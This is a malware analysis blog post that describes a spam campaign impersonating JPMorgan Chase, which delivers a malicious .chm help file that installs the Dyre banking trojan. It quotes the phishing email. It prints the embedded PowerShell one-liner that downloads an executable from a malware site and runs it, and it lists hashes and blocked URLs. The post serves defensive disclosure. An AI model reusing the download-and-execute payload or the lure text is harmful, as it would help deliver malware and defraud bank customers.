Microsoft Help File Malware Targets JPMorgan Chase Customers

Posted on by

A fresh malware sample was recently spotted using an attached Microsoft Compiled HTML (Help file) attached to spam messages. A Microsoft Help file is a binary file, which encompasses a set of HTML files; it usually has a .chm or .hlp extension.

The malicious help file malware analyzed – a .chm file – arrived via spam email posing as coming from JPMorgan Chase & Co., a global financial services firm. The text of the email is as follows:

“Dear client,

As your personal manager, I would like to inform you that the terms for your credit agreement terms have been changed according to the new bank policy. Please consult the following Attachment to learn the new terms.

Yours sincerely,

Chase Bank.” 

The email also has an attachment named “cannon.zip”. When this attachment is opened, it contains a .chm file named “Message.chm”.

Using a file viewer makes it clear that the .chm file is compressed.

Using a file viewer makes it clear that the .chm file is compressed.

If the .chm is opened, a command prompt opens up momentarily, providing a hint that something is happening in the background.

The help file contains this message.

The help file contains this message.

Viewing the HTML source shows that a PowerShell script was used to download and execute another file:

<PARAM name=”Item1″

value=”,cmd,/c powershell (New-Object System.Net.WebClient).DownloadFile(‘hxxp://integrityshavenequinerescuecentre.ca/css/oswald-webfont/test.exe’,’%TEMP%natmasla2.exe’);(New-Object -com Shell.Application).ShellExecute(‘%TEMP%natmasla2.exe’)”>

<PARAM name=”Item2″ value=”273,1,1″>

The script will download a file from a known malware website and will be saved in the TEMP folder as natmasla2.exe. This file will immediately be executed using the ShellExecute command.

The first downloaded file then connects to a PHP resource and receives instructions to download a second file, containing Dyre/Dyreza. As noted recentlyDyre is a banking botnet Trojan with other capabilities.

MD5 Hashes:

  • chm: 14b166abd7279baa483cfc6e33fc5a3e
  • First file (exe): e821100cd69a0902d6ac5b1e56874692
  • Second file (php): 72841b43391206f983b0fa2ea0be331a

VIPRE Detections:

  • .chm is detected by VIPRE as CHM.Generic.a (v)
  • First download is detected by VIPRE as Malware!Drop
  • Second download is detected by VIPRE as Win32.Generic!BT

VIPRE blacklists both URLs:

  • First download: hxxp://integrityshavenequinerescuecentre.ca/css/oswald-webfont/test.exe
  • Second download: hxxp://nsgatewayllc.com/news/rss.php

The malicious spam containing this attachment did not originate from JPMorgan Chase or Microsoft. There is no evidence that JPMorgan or Microsoft, or any of their systems have been compromised.

Credit: Dean Lawrence M. Bueno ­– Malware Researcher

The post Microsoft Help File Malware Targets JPMorgan Chase Customers appeared first on ThreatTrack Security Labs Blog.